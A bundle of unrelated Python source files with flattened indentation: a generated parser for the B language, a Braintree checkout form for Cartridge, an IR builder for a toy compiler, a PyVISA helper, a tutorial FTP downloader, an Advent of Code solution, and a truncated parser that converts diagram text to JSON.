with self._optional():
self._ivallist_()
self.ast['ivals'] = self.last_node
self._token(';')
self.ast._define(
['name', 'maxidx', 'ivals'],
[]
)
@graken()
def _ivallist_(self):
self._ival_()
self.ast.setlist('@', self.last_node)
def block1():
self._token(',')
self._ival_()
self.ast.setlist('@', self.last_node)
self._closure(block1)
@graken()
def _ival_(self):
with self._choice():
with self._option():
self._numericexpr_()
with self._option():
self._characterexpr_()
with self._option():
self._stringexpr_()
self._error('no available options')
@graken()
def _functiondef_(self):
self._name_()
self.ast['name'] = self.last_node
self._token('(')
with self._optional():
self._namelist_()
self.ast['args'] = self.last_node
self._token(')')
self._cut()
self._statement_()
self.ast['body'] = self.last_node
self.ast._define(
['name', 'args', 'body'],
[]
)
@graken()
def _statement_(self):
with self._choice():
with self._option():
self._labelstatement_()
with self._option():
self._gotostatement_()
with self._option():
self._switchstatement_()
with self._option():
self._casestatement_()
with self._option():
self._breakstatement_()
with self._option():
self._autostatement_()
with self._option():
self._extrnstatement_()
with self._option():
self._compoundstatement_()
with self._option():
self._ifstatement_()
with self._option():
self._whilestatement_()
with self._option():
self._returnstatement_()
with self._option():
self._exprstatement_()
with self._option():
self._nullstatement_()
self._error('no available options')
@graken()
def _labelstatement_(self):
with self._ifnot():
with self._group():
self._token('default')
self._name_()
self.ast['label'] = self.last_node
self._token(':')
self._statement_()
self.ast['statement'] = self.last_node
self.ast._define(
['label', 'statement'],
[]
)
@graken()
def _gotostatement_(self):
self._token('goto')
self._cut()
self._name_()
self.ast['label'] = self.last_node
self._token(';')
self.ast._define(
['label'],
[]
)
@graken()
def _switchstatement_(self):
self._token('switch')
self._cut()
self._expr_()
self.ast['rvalue'] = self.last_node
self._cut()
self._statement_()
self.ast['body'] = self.last_node
self.ast._define(
['rvalue', 'body'],
[]
)
@graken()
def _casestatement_(self):
with self._group():
with self._choice():
with self._option():
with self._group():
self._token('case')
self._constantexpr_()
self.ast['cond'] = self.last_node
with self._option():
self._token('default')
self._error('expecting one of: default')
self._cut()
self._token(':')
self._statement_()
self.ast['then'] = self.last_node
self.ast._define(
['cond', 'then'],
[]
)
@graken()
def _breakstatement_(self):
self._token('break')
self._token(';')
@graken()
def _autostatement_(self):
self._token('auto')
self._cut()
self._autovar_()
self.ast.setlist('@', self.last_node)
def block1():
self._token(',')
self._autovar_()
self.ast.setlist('@', self.last_node)
self._closure(block1)
self._token(';')
@graken()
def _autovar_(self):
self._name_()
self.ast['name'] = self.last_node
with self._optional():
self._token('[')
self._constantexpr_()
self.ast['maxidx'] = self.last_node
self._token(']')
self.ast._define(
['name', 'maxidx'],
[]
)
@graken()
def _extrnstatement_(self):
self._token('extrn')
self._cut()
self._namelist_()
self.ast['@'] = self.last_node
self._token(';')
@graken()
def _compoundstatement_(self):
self._token('{')
self._cut()
def block1():
self._statement_()
self._cut()
self._closure(block1)
self.ast['@'] = self.last_node
self._token('}')
@graken()
def _ifstatement_(self):
self._token('if')
self._cut()
self._token('(')
self._expr_()
self.ast['cond'] = self.last_node
self._token(')')
self._statement_()
self.ast['then'] = self.last_node
with self._optional():
self._token('else')
self._statement_()
self.ast['otherwise'] = self.last_node
self.ast._define(
['cond', 'then', 'otherwise'],
[]
)
@graken()
def _whilestatement_(self):
self._token('while')
self._cut()
self._token('(')
self._expr_()
self.ast['cond'] = self.last_node
self._token(')')
self._statement_()
self.ast['body'] = self.last_node
self.ast._define(
['cond', 'body'],
[]
)
@graken()
def _returnstatement_(self):
self._token('return')
self._cut()
with self._optional():
self._token('(')
self._expr_()
self.ast['return_value'] = self.last_node
self._token(')')
self._token(';')
self.ast._define(
['return_value'],
[]
)
@graken()
def _exprstatement_(self):
self._expr_()
self.ast['@'] = self.last_node
self._token(';')
@graken()
def _nullstatement_(self):
self._token(';')
@graken()
def _expr_(self):
self._assignexpr_()
@graken()
def _assignexpr_(self):
self._condexpr_()
self.ast['lhs'] = self.last_node
with self._optional():
self._assignop_()
self.ast['op'] = self.last_node
self._assignexpr_()
self.ast['rhs'] = self.last_node
self.ast._define(
['lhs', 'op', 'rhs'],
[]
)
@graken()
def _assignop_(self):
self._pattern(r'=([+\-/\*%&^|]|[=!]=|>[=>]?|<[=<]?)?')
@graken()
def _condexpr_(self):
self._orexpr_()
self.ast['cond'] = self.last_node
with self._optional():
self._token('?')
self._condexpr_()
self.ast['then'] = self.last_node
self._token(':')
self._condexpr_()
self.ast['otherwise'] = self.last_node
self.ast._define(
['cond', 'then', 'otherwise'],
[]
)
@graken()
def _orexpr_(self):
self._xorexpr_()
self.ast['lhs'] = self.last_node
def block2():
self._ortail_()
self._closure(block2)
self.ast['tail'] = self.last_node
self.ast._define(
['lhs', 'tail'],
[]
)
@graken()
def _ortail_(self):
self._token('|')
self.ast['op'] = self.last_node
self._xorexpr_()
self.ast['rhs'] = self.last_node
self.ast._define(
['op', 'rhs'],
[]
)
@graken()
def _xorexpr_(self):
self._andexpr_()
self.ast['lhs'] = self.last_node
def block2():
self._xortail_()
self._closure(block2)
self.ast['tail'] = self.last_node
self.ast._define(
['lhs', 'tail'],
[]
)
@graken()
def _xortail_(self):
self._token('^')
self.ast['op'] = self.last_node
self._andexpr_()
self.ast['rhs'] = self.last_node
self.ast._define(
['op', 'rhs'],
[]
)
@graken()
def _andexpr_(self):
self._eqexpr_()
self.ast['lhs'] = self.last_node
def block2():
self._andtail_()
self._closure(block2)
self.ast['tail'] = self.last_node
self.ast._define(
['lhs', 'tail'],
[]
)
@graken()
def _andtail_(self):
self._token('&')
self.ast['op'] = self.last_node
self._eqexpr_()
self.ast['rhs'] = self.last_node
self.ast._define(
['op', 'rhs'],
[]
)
@graken()
def _eqexpr_(self):
self._relexpr_()
self.ast['lhs'] = self.last_node
def block2():
self._eqtail_()
self._closure(block2)
self.ast['tail'] = self.last_node
self.ast._define(
['lhs', 'tail'],
[]
)
@graken()
def _eqtail_(self):
self._eqop_()
self.ast['op'] = self.last_node
self._relexpr_()
self.ast['rhs'] = self.last_node
self.ast._define(
['op', 'rhs'],
[]
)
@graken()
def _eqop_(self):
self._pattern(r'[!=]=')
@graken()
def _relexpr_(self):
self._shiftexpr_()
self.ast['lhs'] = self.last_node
def block2():
self._reltail_()
self._closure(block2)
self.ast['tail'] = self.last_node
self.ast._define(
['lhs', 'tail'],
[]
)
@graken()
def _reltail_(self):
self._relop_()
self.ast['op'] = self.last_node
self._shiftexpr_()
self.ast['rhs'] = self.last_node
self.ast._define(
['op', 'rhs'],
[]
)
@graken()
def _relop_(self):
self._pattern(r'[<>]={0,1}')
@graken()
def _shiftexpr_(self):
self._addexpr_()
self.ast['lhs'] = self.last_node
def block2():
self._shifttail_()
self._closure(block2)
self.ast['tail'] = self.last_node
self.ast._define(
['lhs', 'tail'],
[]
)
@graken()
def _shifttail_(self):
self._shiftop_()
self.ast['op'] = self.last_node
self._addexpr_()
self.ast['rhs'] = self.last_node
self.ast._define(
['op', 'rhs'],
[]
)
@graken()
def _shiftop_(self):
self._pattern(r'<<|>>')
@graken()
def _addexpr_(self):
self._multexpr_()
self.ast['lhs'] = self.last_node
def block2():
self._addtail_()
self._closure(block2)
self.ast['tail'] = self.last_node
self.ast._define(
['lhs', 'tail'],
[]
)
@graken()
def _addtail_(self):
self._addop_()
self.ast['op'] = self.last_node
self._multexpr_()
self.ast['rhs'] = self.last_node
self.ast._define(
['op', 'rhs'],
[]
)
@graken()
def _addop_(self):
self._pattern(r'[+-]')
@graken()
def _multexpr_(self):
self._unaryexpr_()
self.ast['lhs'] = self.last_node
def block2():
self._multtail_()
self._closure(block2)
self.ast['tail'] = self.last_node
self.ast._define(
['lhs', 'tail'],
[]
)
@graken()
def _multtail_(self):
self._multop_()
self.ast['op'] = self.last_node
self._unaryexpr_()
self.ast['rhs'] = self.last_node
self.ast._define(
['op', 'rhs'],
[]
)
@graken()
def _multop_(self):
self._pattern(r'[/%\*]')
@graken()
def _unaryexpr_(self):
def block1():
self._leftunaryop_()
self._closure(block1)
self.ast['leftops'] = self.last_node
self._primaryexpr_()
self.ast['rhs'] = self.last_node
def block4():
self._rightunaryop_()
self._closure(block4)
self.ast['rightops'] = self.last_node
self.ast._define(
['leftops', 'rhs', 'rightops'],
[]
)
@graken()
def _leftunaryop_(self):
self._pattern(r'[\*&!\~]|--?|\+\+')
@graken()
def _rightunaryop_(self):
with self._choice():
with self._option():
self._token('++')
with self._option():
self._token('--')
self._error('expecting one of: ++ --')
@graken()
def _primaryexpr_(self):
self._primaryexprhead_()
self.ast['head'] = self.last_node
def block2():
self._primaryexprtail_()
self._closure(block2)
self.ast['tail'] = self.last_node
self.ast._define(
['head', 'tail'],
[]
)
@graken()
def _primaryexprhead_(self):
with self._choice():
with self._option():
self._token('(')
self._expr_()
self.ast['@'] = self.last_node
self._token(')')
with self._option():
self._builtinexpr_()
with self._option():
self._variableexpr_()
with self._option():
self._constantexpr_()
with self._option():
self._stringexpr_()
self._error('no available options')
@graken()
def _primaryexprtail_(self):
with self._choice():
with self._option():
self._token('(')
with self._optional():
self._exprlist_()
self.ast['args'] = self.last_node
self._token(')')
with self._option():
self._token('[')
self._expr_()
self.ast['index'] = self.last_node
self._token(']')
self._error('expecting one of: (')
self.ast._define(
['args', 'index'],
[]
)
@graken()
def _variableexpr_(self):
with self._ifnot():
self._builtinexpr_()
self._name_()
@graken()
def _constantexpr_(self):
with self._choice():
with self._option():
self._numericexpr_()
with self._option():
self._characterexpr_()
self._error('no available options')
@graken()
def _builtinexpr_(self):
self._token('__bytes_per_word')
@graken()
def _numericexpr_(self):
def block0():
self._NUMERIC_()
self._positive_closure(block0)
@graken()
def _characterexpr_(self):
self._token("'")
def block1():
self._CHARACTERCONSTCHAR_()
self._closure(block1)
self.ast['@'] = self.last_node
self._token("'")
@graken()
def _stringexpr_(self):
self._token('"')
def block1():
self._STRINGCONSTCHAR_()
self._closure(block1)
self.ast['@'] = self.last_node
self._token('"')
@graken()
def _name_(self):
self._ALPHA_()
self.ast['head'] = self.last_node
def block2():
with self._choice():
with self._option():
self._ALPHA_()
with self._option():
self._NUMERIC_()
self._error('no available options')
self._closure(block2)
self.ast['tail'] = self.last_node
self.ast._define(
['head', 'tail'],
[]
)
@graken()
def _ALPHA_(self):
self._pattern(r'[A-Za-z_\.\b]')
@graken()
def _NUMERIC_(self):
self._pattern(r'[0-9]')
@graken()
def _CHARACTERCONSTCHAR_(self):
self._pattern(r"([^'\*])|(\*.)")
@graken()
def _STRINGCONSTCHAR_(self):
self._pattern(r'([^"\*])|(\*.)')
@graken()
def _exprlist_(self):
self._expr_()
self.ast.setlist('@', self.last_node)
def block1():
self._token(',')
self._expr_()
self.ast.setlist('@', self.last_node)
self._closure(block1)
@graken()
def _namelist_(self):
self._name_()
self.ast.setlist('@', self.last_node)
def block1():
self._token(',')
self._name_()
self.ast.setlist('@', self.last_node)
self._closure(block1)
class BSemantics(object):
def program(self, ast):
return ast
def definition(self, ast):
return ast
def simpledef(self, ast):
return ast
def vectordef(self, ast):
return ast
def ivallist(self, ast):
return ast
def ival(self, ast):
return ast
def functiondef(self, ast):
return ast
def statement(self, ast):
return ast
def labelstatement(self, ast):
return ast
def gotostatement(self, ast):
return ast
def switchstatement(self, ast):
return ast
def casestatement(self, ast):
return ast
def breakstatement(self, ast):
return ast
def autostatement(self, ast):
return ast
def autovar(self, ast):
return ast
def extrnstatement(self, ast):
return ast
def compoundstatement(self, ast):
return ast
def ifstatement(self, ast):
return ast
def whilestatement(self, ast):
return ast
def returnstatement(self, ast):
return ast
def exprstatement(self, ast):
return ast
def nullstatement(self, ast):
return ast
def expr(self, ast):
return ast
def assignexpr(self, ast):
return ast
def assignop(self, ast):
return ast
def condexpr(self, ast):
return ast
def orexpr(self, ast):
return ast
def ortail(self, ast):
return ast
def xorexpr(self, ast):
return ast
def xortail(self, ast):
return ast
def andexpr(self, ast):
return ast
def andtail(self, ast):
return ast
def eqexpr(self, ast):
return ast
def eqtail(self, ast):
return ast
def eqop(self, ast):
return ast
def relexpr(self, ast):
return ast
def reltail(self, ast):
return ast
def relop(self, ast):
return ast
def shiftexpr(self, ast):
return ast
def shifttail(self, ast):
return ast
def shiftop(self, ast):
return ast
def addexpr(self, ast):
return ast
def addtail(self, ast):
return ast
def addop(self, ast):
return ast
def multexpr(self, ast):
return ast
def multtail(self, ast):
return ast
def multop(self, ast):
return ast
def unaryexpr(self, ast):
return ast
def leftunaryop(self, ast):
return ast
def rightunaryop(self, ast):
return ast
def primaryexpr(self, ast):
return ast
def primaryexprhead(self, ast):
return ast
def primaryexprtail(self, ast):
return ast
def variableexpr(self, ast):
return ast
def constantexpr(self, ast):
return ast
def builtinexpr(self, ast):
return ast
def numericexpr(self, ast):
return ast
def characterexpr(self, ast):
return ast
def stringexpr(self, ast):
return ast
def name(self, ast):
return ast
def ALPHA(self, ast):
return ast
def NUMERIC(self, ast):
return ast
def CHARACTERCONSTCHAR(self, ast):
return ast
def STRINGCONSTCHAR(self, ast):
return ast
def exprlist(self, ast):
return ast
def namelist(self, ast):
return ast
def main(filename, startrule, trace=False, whitespace=None, nameguard=None):
import json
with open(filename) as f:
text = f.read()
parser = BParser(parseinfo=False)
ast = parser.parse(
text,
startrule,
filename=filename,
trace=trace,
whitespace=whitespace,
nameguard=nameguard)
print('AST:')
print(ast)
print()
print('JSON:')
print(json.dumps(ast, indent=2))
print()
if __name__ == '__main__':
import argparse
import string
import sys
class ListRules(argparse.Action):
def __call__(self, parser, namespace, values, option_string):
print('Rules:')
for r in BParser.rule_list():
print(r)
print()
sys.exit(0)
parser = argparse.ArgumentParser(description="Simple parser for B.")
parser.add_argument('-l', '--list', action=ListRules, nargs=0,
help="list all rules and exit")
parser.add_argument('-n', '--no-nameguard', action='store_true',
dest='no_nameguard',
help="disable the 'nameguard' feature")
parser.add_argument('-t', '--trace', action='store_true',
help="output trace information")
parser.add_argument('-w', '--whitespace', type=str, default=string.whitespace,
help="whitespace specification")
parser.add_argument('file', metavar="FILE", help="the input file to parse")
parser.add_argument('startrule', metavar="STARTRULE",
help="the start rule for parsing")
args = parser.parse_args()
main(
args.file,
args.startrule,
trace=args.trace,
whitespace=args.whitespace,
nameguard=not args.no_nameguard
)
|
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.utils.html import format_html
from django.forms.util import flatatt
from django.utils.encoding import force_text
from mezzanine.conf import settings
from cartridge.shop.forms import OrderForm
from cartridge.shop import checkout
from cartridge.shop.utils import make_choices
from cartridge_braintree.countries import get_country_names_list
class DataEncryptedTextInput(forms.TextInput):
def render(self, name, value, attrs=None):
# See django.forms.widgets.py,
# class Input, method render()
if value is None:
value = ''
if attrs is None:
attrs = {}
attrs['name'] = name
attrs['autocomplete'] = 'off'
attrs['data-encrypted-name'] = name
final_attrs = self.build_attrs(attrs, type=self.input_type)
# Never add the value to the HTML rendering, this field
# will be encrypted and should remain blank if the form is
# re-loaded!
final_attrs['value'] = ''
return format_html('<input{0} />', flatatt(final_attrs))
class DataEncryptedPasswordInput(DataEncryptedTextInput):
input_type = 'password'
class BraintreeOrderForm(OrderForm):
"""
The following changes are made to the cartridge order form:
- Shipping and Billing country fields are rendered using
a Select widget. This ensures the country selected can be
converted to a valid code for Braintree's payment processing.
- Credit Card number and CCV fields are rendered using the
DataEncryptedTextInput and DataEncryptedPasswordInput widgets
so that the HTML form inputs match what is required for braintree.js
See https://www.braintreepayments.com/docs/python/guide/getting_paid
"""
def __init__(self, request, step, data=None, initial=None, errors=None):
OrderForm.__init__(self, request, step, data, initial, errors)
is_first_step = step == checkout.CHECKOUT_STEP_FIRST
is_last_step = step == checkout.CHECKOUT_STEP_LAST
is_payment_step = step == checkout.CHECKOUT_STEP_PAYMENT
# Get list of country names
countries = make_choices(get_country_names_list())
if settings.SHOP_CHECKOUT_STEPS_SPLIT:
if is_first_step:
# Change country widgets to a Select widget
self.fields["billing_detail_country"].widget = forms.Select(choices=countries)
self.fields["billing_detail_country"].initial = settings.SHOP_DEFAULT_COUNTRY
self.fields["shipping_detail_country"].widget = forms.Select(choices=countries)
self.fields["shipping_detail_country"].initial= settings.SHOP_DEFAULT_COUNTRY
if is_payment_step:
# Make card number and cvv fields use the data encrypted widget
self.fields["card_number"].widget = DataEncryptedTextInput()
self.fields["card_ccv"].widget = DataEncryptedPasswordInput()
else:
# Change country widgets to a Select widget
self.fields["billing_detail_country"].widget = forms.Select(choices=countries)
self.fields["billing_detail_country"].initial = settings.SHOP_DEFAULT_COUNTRY
self.fields["shipping_detail_country"].widget = forms.Select(choices=countries)
self.fields["shipping_detail_country"].initial= settings.SHOP_DEFAULT_COUNTRY
if settings.SHOP_PAYMENT_STEP_ENABLED:
# Make card number and cvv fields use the data encrypted widget
self.fields["card_number"].widget = DataEncryptedTextInput()
self.fields["card_ccv"].widget = DataEncryptedPasswordInput()
|
from impact.tests.api_test_case import APITestCase
from impact.tests.factories import JudgingRoundFactory
class TestJudgingRound(APITestCase):
def test_str(self):
judging_round = JudgingRoundFactory()
judging_round_string = str(judging_round)
assert judging_round.name in judging_round_string
assert str(judging_round.program) in judging_round_string
|
__author__ = 'sarangis'
from src.ir.function import *
from src.ir.module import *
from src.ir.instructions import *
BINARY_OPERATORS = {
'+': lambda x, y: x + y,
'-': lambda x, y: x - y,
'*': lambda x, y: x * y,
'**': lambda x, y: x ** y,
'/': lambda x, y: x / y,
'//': lambda x, y: x // y,
'<<': lambda x, y: x << y,
'>>': lambda x, y: x >> y,
'%': lambda x, y: x % type(x)(y),
'&': lambda x, y: x & y,
'|': lambda x, y: x | y,
'^': lambda x, y: x ^ y,
}
class IRBuilder:
""" The main builder to be used for creating instructions. This has to be used to insert / create / modify instructions
This class will have to support all the other class creating it.
"""
def __init__(self, current_module = None, context=None):
self.__module = current_module
self.__insertion_point = None
self.__insertion_point_idx = 0
self.__orphaned_instructions = []
self.__context = context
self.__current_bb = None
@property
def module(self):
return self.__module
@module.setter
def module(self, mod):
self.__module = mod
@property
def context(self):
return self.__context
@context.setter
def context(self, ctx):
self.__context = ctx
def get_current_bb(self):
assert self.__current_bb is not None
return self.__current_bb
def insert_after(self, ip):
if isinstance(ip, BasicBlock):
self.__insertion_point = ip
self.__insertion_point_idx = 0
self.__current_bb = ip
elif isinstance(ip, Instruction):
self.__insertion_point = ip
self.__insertion_point_idx = ip.parent.find_instruction_idx(ip)
if self.__insertion_point_idx is None:
raise InvalidInstructionException("Count not find instruction in its parent basic block")
else:
self.__insertion_point_idx += 1
else:
raise InvalidTypeException("Expected either Basic Block or Instruction")
def insert_before(self, ip):
if isinstance(ip, BasicBlock):
self.__insertion_point = ip
self.__insertion_point_idx = -1
self.__current_bb = ip
elif isinstance(ip, Instruction):
self.__insertion_point = ip
self.__insertion_point_idx = ip.parent.find_instruction_idx(ip)
if self.__insertion_point_idx == None:
raise InvalidInstructionException("Count not find instruction in its parent basic block")
elif self.__insertion_point_idx == 0:
self.__insertion_point_idx = 0
else:
self.__insertion_point_idx -= 1
else:
raise InvalidTypeException("Expected either Basic Block or Instruction")
def __add_instruction(self, inst):
if self.__insertion_point_idx == -1:
# This is an orphaned instruction
self.__orphaned_instructions.append(inst)
elif isinstance(self.__insertion_point, BasicBlock):
self.__insertion_point.instructions.append(inst)
self.__insertion_point = inst
elif isinstance(self.__insertion_point, Instruction):
bb = self.__insertion_point.parent
bb.instructions.insert(self.__insertion_point_idx + 1, inst)
self.__insertion_point_idx += 1
self.__insertion_point = inst
else:
raise Exception("Could not add instruction")
def const_fold_binary_op(self, lhs, rhs, op):
return None
# if isinstance(lhs, Number) and isinstance(rhs, Number):
# lhs = lhs.number
# rhs = rhs.number
# result = BINARY_OPERATORS[op](lhs, rhs)
# return Number(result)
# else:
# return None
def create_function(self, name, args):
f = Function(name, args)
self.__module.functions[name] = f
return f
def set_entry_point(self, function):
self.__module.entry_point = function
def create_global(self, name, initializer):
g = Global(name, initializer)
self.__module.add_global(g)
def create_basic_block(self, name, parent):
bb = BasicBlock(name, parent)
return bb
def create_return(self, value = None, name=None):
ret_inst = ReturnInstruction(value)
self.__add_instruction(ret_inst)
def create_branch(self, bb, name=None):
if not isinstance(bb, BasicBlock):
raise InvalidTypeException("Expected a Basic Block")
branch_inst = BranchInstruction(bb, self.__current_bb, name)
self.__add_instruction(branch_inst)
return branch_inst
def create_cond_branch(self, cmp_inst, value, bb_true, bb_false, name=None):
cond_branch = ConditionalBranchInstruction(cmp_inst, value, bb_true, bb_false, self.__current_bb, name)
self.__add_instruction(cond_branch)
return cond_branch
def create_call(self, func, args, name=None):
call_inst = CallInstruction(func, args, self.__current_bb, name)
self.__add_instruction(call_inst)
return call_inst
def create_add(self, lhs, rhs, name=None):
folded_inst = self.const_fold_binary_op(lhs, rhs, '+')
if folded_inst is not None:
return folded_inst
add_inst = AddInstruction(lhs, rhs, self.__current_bb, name)
self.__add_instruction(add_inst)
return add_inst
def create_sub(self, lhs, rhs, name=None):
folded_inst = self.const_fold_binary_op(lhs, rhs, '-')
if folded_inst is not None:
return folded_inst
sub_inst = SubInstruction(lhs, rhs, self.__current_bb, name)
self.__add_instruction(sub_inst)
return sub_inst
def create_mul(self, lhs, rhs, name=None):
folded_inst = self.const_fold_binary_op(lhs, rhs, '*')
if folded_inst is not None:
return folded_inst
mul_inst = MulInstruction(lhs, rhs, self.__current_bb, name)
self.__add_instruction(mul_inst)
return mul_inst
def create_div(self, lhs, rhs, name=None):
folded_inst = self.const_fold_binary_op(lhs, rhs, '/')
if folded_inst is not None:
return folded_inst
div_inst = DivInstruction(lhs, rhs, self.__current_bb, name)
self.__add_instruction(div_inst)
return div_inst
def create_icmp(self, lhs, rhs, comparator, name=None):
icmp_inst = ICmpInstruction(CompareTypes.SLE, lhs, rhs, self.__current_bb, name)
self.__add_instruction(icmp_inst)
return icmp_inst
def create_select(self, cond, val_true, val_false, name=None):
select_inst = SelectInstruction(cond, val_true, val_false, self.__current_bb, name)
self.__add_instruction(select_inst)
return select_inst
def create_alloca(self, numEls=None, name=None):
alloca_inst = AllocaInstruction(numEls, self.__current_bb, name)
self.__add_instruction(alloca_inst)
return alloca_inst
def create_load(self, alloca):
load_inst = LoadInstruction(alloca, parent=self.__current_bb)
self.__add_instruction(load_inst)
return load_inst
def create_store(self, alloca, value):
store_inst = StoreInstruction(alloca, value, parent=self.__current_bb)
self.__add_instruction(store_inst)
return store_inst
def create_shl(self, op1, op2, name=None):
folded_inst = self.const_fold_binary_op(op1, op2, '<<')
if folded_inst is not None:
return folded_inst
shl_inst = ShiftLeftInstruction(op1, op2, self.__current_bb, name)
self.__add_instruction(shl_inst)
return shl_inst
def create_lshr(self, op1, op2, name=None):
folded_inst = self.const_fold_binary_op(op1, op2, '>>')
if folded_inst is not None:
return folded_inst
lshr_inst = LogicalShiftRightInstruction(op1, op2, self.__current_bb, name)
self.__add_instruction(lshr_inst)
return lshr_inst
def create_ashr(self, op1, op2, name=None):
ashr_inst = ArithmeticShiftRightInstruction(op1, op2, self.__current_bb, name)
self.__add_instruction(ashr_inst)
return ashr_inst
def create_and(self, op1, op2, name=None):
folded_inst = self.const_fold_binary_op(op1, op2, '&')
if folded_inst is not None:
return folded_inst
and_inst = AndInstruction(op1, op2, self.__current_bb, name)
self.__add_instruction(and_inst)
return and_inst
def create_or(self, op1, op2, name=None):
folded_inst = self.const_fold_binary_op(op1, op2, '|')
if folded_inst is not None:
return folded_inst
or_inst = OrInstruction(op1, op2, self.__current_bb, name)
self.__add_instruction(or_inst)
return or_inst
def create_xor(self, op1, op2, name=None):
folded_inst = self.const_fold_binary_op(op1, op2, '^')
if folded_inst is not None:
return folded_inst
xor_inst = XorInstruction(op1, op2, self.__current_bb, name)
self.__add_instruction(xor_inst)
return xor_inst
def create_number(self, number):
number = Number(number)
return number
def create_string(self, string):
string_obj = String(string)
return string_obj
#def create_vector(self, baseTy, numElts, name=None):
# vecTy = VectorType(baseTy, numElts)
# alloca = self.create_alloca(vecTy, 1, None, name)
# vec = self.create_load(alloca)
# return vec
|
"""
pyvisa.visa
~~~~~~~~~~~
Module to provide an import shortcut for the most common VISA operations.
This file is part of PyVISA.
:copyright: 2014 by PyVISA Authors, see AUTHORS for more details.
:license: MIT, see COPYING for more details.
"""
from __future__ import division, unicode_literals, print_function, absolute_import
from pyvisa import logger, __version__, log_to_screen, constants
from pyvisa.highlevel import ResourceManager
from pyvisa.errors import (Error, VisaIOError, VisaIOWarning, VisaTypeError,
UnknownHandler, OSNotSupported, InvalidBinaryFormat,
InvalidSession, LibraryError)
from pyvisa.resources import Resource
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='PyVISA command-line utilities')
parser.add_argument('--backend', '-b', dest='backend', action='store', default=None,
help='backend to be used (default: ni)')
subparsers = parser.add_subparsers(title='command', dest='command')
info_parser = subparsers.add_parser('info', help='print information to diagnose PyVISA')
console_parser = subparsers.add_parser('shell', help='start the PyVISA console')
args = parser.parse_args()
if args.command == 'info':
from pyvisa import util
util.get_debug_info()
elif args.command == 'shell':
from pyvisa import shell
shell.main('@' + args.backend if args.backend else '')
|
"""
Created on Sat May 21 16:43:47 2016
@author: Pratik
"""
from ftplib import FTP
import os
def ftpDownloader(filename, host="ftp.pyclass.com", user="student@pyclass.com", passwd="student123"):
ftp = FTP(host) # get the host url of ftp site
ftp.login(user, passwd) # login with username and password
ftp.cwd('Data') # change directory to Data
os.chdir("/Users/Pratik/Documents/Pratik/Work/practice/py-data-analysis") # change directory
print(ftp.nlst()) # print list of all files in dir
with open(filename, 'wb') as file: # open file and w/r
ftp.retrbinary('RETR %s' % filename, file.write) # read contents of pdf and write to our file
|
class PresentDeliverer:
present_locations = {}
def __init__(self, name):
self.name = name
self.x = 0
self.y = 0
self.present_locations[self.get_key()]=1
def get_key(self):
return str(self.x)+"-"+str(self.y)
def status(self):
print(self.name + " x: "+str(self.x)+" y: "+str(self.y))
def move(self,instruction):
if instruction == ">":
self.x += 1
elif instruction == "<":
self.x -= 1
elif instruction == "^":
self.y += 1
else:
self.y -= 1
self.present_locations[self.get_key()]=1
def unique_houses(self):
print("Unique houses: "+str(len(self.present_locations.keys())))
filename = "..\inputs\day_three_input.txt"
f = open(filename)
input_line = f.readline()
santa = PresentDeliverer("Santa")
robo = PresentDeliverer("RoboSanta")
instruction_count = 0
for c in input_line:
instruction_count += 1
if (instruction_count % 2):
santa.move(c)
else:
robo.move(c)
santa.unique_houses()
|
import json
from sets import Set
from sys import maxint
import math
def norm2 (a):
return dot(a, a)
def dot ( a, b ):
return a[0] * b[0] + a[1] * b[1] + a[2] * b[2]
def area (a, b, c):
u = [ b[0] - a[0], b[1] - a[1], b[2] - a[2] ]
v = [ c[0] - a[0], c[1] - a[1], c[2] - a[2] ]
dot_uv = dot(u, v)
cross2 = norm2(u) * norm2(v) - dot_uv * dot_uv
return math.sqrt(cross2) * 0.5
class DiagramJson:
def __init__(self):
self.json = {
'form': {
'vertices': {},
'vertices_2_force_faces': {}, # face array
'vertices_2_force_cells': {},
'vertices_external': None, # converted from set: vid: 1
'edges': {}
},
'force': {
'vertices': {},
'edges': {},
'faces_e': {},
'faces_v': {},
'cells': {}
},
'strength_scaler': {
'min': maxint,
'max': 0
},
'force_face_2_strength': {}
}
class Txt2JsonParser:
def __init__(self):
self.diagramJson = DiagramJson()
# # tmp data structures used only when parsing
# self.form_edge_2_vertex = {}
self.force_face_2_form_edge = {} # inverse index, for caluclate edge width i.e. area of faces (strength)
# self.form_vertex_external_count = {} # vid: count - 0, 1, 2
def readFormVertex(self, filename):
f = open(filename)
v = self.diagramJson.json['form']['vertices']
v2fa = self.diagramJson.json['form']['vertices_2_force_faces']
for line in f:
vertex = line.strip().split('\t')
# print vertex
v[vertex[0]] = map(float, vertex[1:])
# create array for form_vertices to force_face array (cells)
v2fa[vertex[0]] = []
# print self.diagramJson.json
f.close()
def readFormEdge(self, filename_edge_vertex, filename_edge_to_force_face, filename_edge_ex):
f_edge_vertex = open(filename_edge_vertex)
edges = self.diagramJson.json['form']['edges']
for line in f_edge_vertex:
edge = line.strip().split('\t')
e = edges[edge[0]] = {}
e['vertex'] = edge[1:]
# e['external'] = False
# print edge[0], e['vertex']
# print edges
f_edge_vertex.close()
v2fa = self.diagramJson.json['form']['vertices_2_force_faces']
f_edge_to_force_face = open(filename_edge_to_force_face)
for line in f_edge_to_force_face:
edge = line.strip().split('\t')
f = edge[1] if edge[1] != "Null" else None
edges[edge[0]]['force_face'] = f
edge_vertex = edges[edge[0]]['vertex']
for v in edge_vertex:
v2fa[v].append(f)
# force_face_2_form_edge (tmp structure) for compute strength
if f != None:
self.force_face_2_form_edge[f] = edge[0]
f_edge_to_force_face.close()
vertex_ex_set = Set()
f_edge_ex = open(filename_edge_ex)
for line in f_edge_ex:
edge = line.strip().split('\t')
for e in edge:
edges[e]['external'] = True
vertex_ex_set.add(edges[e]['vertex'][0])
vertex_ex_set.add(edges[e]['vertex'][1])
f_edge_ex.close()
self.diagramJson.json['form']['vertices_external'] = dict.fromkeys(vertex_ex_set, 1)
# label external force edge
for e in edges:
is_ex_vertex_0 = edges[e]['vertex'][0] in vertex_ex_set
is_ex_vertex_1 = edges[e]['vertex'][1] in vertex_ex_set
if is_ex_vertex_0 != is_ex_vertex_1:
# print edges[e]['vertex'][0], ':', is_ex_vertex_0, ' , ', edges[e]['vertex'][1], ':', is_ex_vertex_1
# force vector: from v0 to v1
edges[e]['ex_force'] = True
# print edges
# print self.diagramJson.json
def readForceVertex(self, filename):
f = open(filename)
v = self.diagramJson.json['force']['vertices']
for line in f:
vertex = line.strip().split('\t')
# print vertex
v[vertex[0]] = map(float, vertex[1:])
# print self.diagramJson.json
f.close()
def readForceEdge(self, filename_edge_vertex):
f_edge_vertex = open(filename_edge_vertex)
